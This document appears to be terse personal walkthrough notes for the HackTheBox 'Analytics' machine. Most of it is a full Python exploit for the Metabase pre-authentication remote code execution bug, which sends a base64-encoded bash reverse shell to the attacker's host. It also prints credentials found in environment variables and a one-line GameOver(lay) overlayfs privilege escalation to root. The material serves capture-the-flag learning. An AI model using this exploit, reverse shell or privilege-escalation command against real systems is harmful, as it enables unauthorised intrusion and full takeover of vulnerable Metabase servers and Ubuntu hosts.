analytics

  login button reveals a metabase login page (after adding data.analytical.htb to hosts)

  some googling reveals this https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

  getting the token from /api/session/properties

  writing the exploit sender:

  ```
  #!/usr/bin/python

  import requests
  import base64
  
  TOKEN = "249fa03d-fd94-4d5b-b94f-b4ebf3df681f"
  
  LHOST = "10.10.16.3"
  
  RHOST = "10.10.11.233"
  
  CONNECT_STR = f"bash -i >&/dev/tcp/{LHOST}/9998 0>&1"
  
  CONNECT_STR = base64.b64encode(CONNECT_STR.encode('utf-8')).decode('utf-8')
  
  payload = {
      "token": TOKEN,
      "details":
      {
          "is_on_demand": False,
          "is_full_sync": False,
          "is_sample": False,
          "cache_ttl": None,
          "refingerprint": False,
          "auto_run_queries": True,
          "schedules": {},
          "details":
          {
              "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{CONNECT_STR}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x",
              "advanced-options": False,
              "ssl": True
          },
          "name": "an-sec-research-team",
          "engine": "h2"
      }
  }
  
  print('PAYLOAD:', payload['details']['details']['db'])
  print('\n')
  
  r = requests.post(url="http://data.analytical.htb/api/setup/validate", json=payload)
  print(r)
  ```

  this gives shell on user metabase

  /.dockerenv and uname -a reveal this is a an alpine docker container

  running linpeas reveals login and password in envvars

  metalytics An4lytics_ds20223#

  ssh into this gives user.txt

  uname -a gives Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu andlogin banner says it runs k8

  looking it up reveals gameover(lay) exploit
    - unshare -rm sh -c "mkdir 1 u w m && cp /u*/b*/p*3 1/; setcap cap_setuid+eip 1/python3;mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w, m && touch m/*;" && u/python3 -c 'import pty; import os;os.setuid(0); pty.spawn("/bin/bash")'

  cat /root/root.txt

  gg

